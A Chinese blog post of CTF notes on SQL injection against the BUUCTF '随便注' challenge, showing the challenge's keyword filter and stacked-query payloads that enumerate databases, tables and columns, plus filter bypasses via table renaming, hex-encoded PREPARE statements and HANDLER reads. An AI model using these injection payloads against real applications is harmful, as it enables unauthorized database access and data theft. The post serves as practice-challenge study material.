CTF-SQL注入笔记

已于 2022-09-28 17:55:24 修改
阅读量465 收藏
点赞数
分类专栏: CTF 文章标签: sql mysql
于 2022-09-27 16:19:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35697696/article/details/127069196
版权
这篇博客详细记录了作者在CTF比赛中遇到的SQL注入问题及其解决方案,包括BUUCTF和极客大挑战2019的LoveSQL。文章提到了堆叠查询、MySQL的prepare执行16进制编码语句以及handler等绕过姿势,并提供了相关payload示例。通过sqlmap和手动注入方法,作者成功识别并利用了注入点。
摘要由CSDN通过智能技术生成

BUUCTF

BUUCTF 随便注

关键字: 堆叠查询、MySQL prepare执行16进制编码后语句、
过滤了关键词return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

?inject=0' order by 3 --+ 
// 看库
?inject=1';show databases; --+
// 看ctftraining表
?inject=1';use ctftraining; show tables; %23

在这里插入图片描述
在这里插入图片描述
?inject=1';use ctftraining; show columns from FLAG_TABLE; --+这里应该不是flag
在这里插入图片描述
逐个看
在这里插入图片描述

绕过姿势

  1. rename

    • 1’; rename table words to word1; rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

  2. prepare from

    • select * from 1919810931114514 (encode hex)
    • set@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare inject1 from @a;excute inject1;
    • 该语句不能同时有set&prepare,随便换个大写即可

  3. handler

    • 例子1’; handler FlagHere open as a; handler a read next;#
    • payload: 1’;handler 1919810931114514 open as a;handler a read next; #
最低0.47元/天 解锁文章
朋克归零膏
关注
专栏目录
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6314
关于SQL注入的思维导图可以点开看一下大图
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 493
关于SQL注入的相关CTF笔记
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 5647
以pikachu靶场练习来学习ctf知识
CTFHub~SQL注入超简单详细教程
最新发布
weixin_67832625的博客
08-14 1263
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
CTFSQL 注入 总结
algae
08-15 1026
思路 技巧 常见URL编码 # %23 工具 sqlmap 绕过
CTF-SQL注入总结
SWC0619的博客
03-11 8359
SQL注入总结(一)
CTF学习笔记——sql注入(1)
Obs_cure的博客
08-09 779
一、[强网杯 2019]随便注
CTFHUB-web-SQL注入
ookami6497的博客
11-29 874
CTFHUB SQL
CTF训练笔记(六)- HTTP服务(SQL注入→GET参数注入)(待续)
morrino的博客
04-27 1468
本文介绍了SQL注入中get参数注入部分,也介绍了一些渗透测试常用工具及具体使用实例
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程...- **安全意识**:了解SQL注入的危害性,增强开发过程中防止SQL注入的安全意识。
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 603
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
CTF__(1)Web之SQL手工注入
weixin_30911451的博客
11-24 156
等待更新 转载于:https://www.cnblogs.com/HeroCat/p/10013445.html
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(2),2024年最新阿里P7大牛整理
2401_84302761的博客
05-12 1050
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTFSQL注入思路总结与ssrf总结
qq_26335381的博客
11-03 1020
查出数据库名 查出表名 查出列名 查具体信息group_concat(username,password) from users 过滤字段:1.大小写 2.双写绕过 过滤省略号:--+##--%23 过滤空格:%0a()/**/%20%09%0c%0d 过滤=号:like。
CTF Web SQL注入专项整理(持续更新中)
m0_73734159的博客
10-19 3905
SQL注入专项整理
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
sql注入基础(ctfhub sql注入
kofi的博客,已停更
08-15 799
(持续更新中)sql注入基础0x00 前言 0x00 前言 这两天在CTFHub上练题,刚好练到了SQL注入这个之前我一直也不是很懂,这回一做发现其中大有玄妙,所以就一起写个小总结。 CTFhHub:https://www.ctfhub.com/#/index 上面这张图是CTFHub的SQL注入技能树 ...
ctf-web--总结几点基础题的做题思路
热门推荐
Sanky0u的博客
08-14 2万+
做了三天web题了,因为刚入门,还是不要做得太快,先把前几天学到的好好总结一下,一部分是做的几道bugku上的web题,一部分是合天网安上面做的几道web题,这篇博客就先介绍第一部分。 1. 看源码可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2.
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
2401_84973202的博客
05-11 2039
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 1227
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值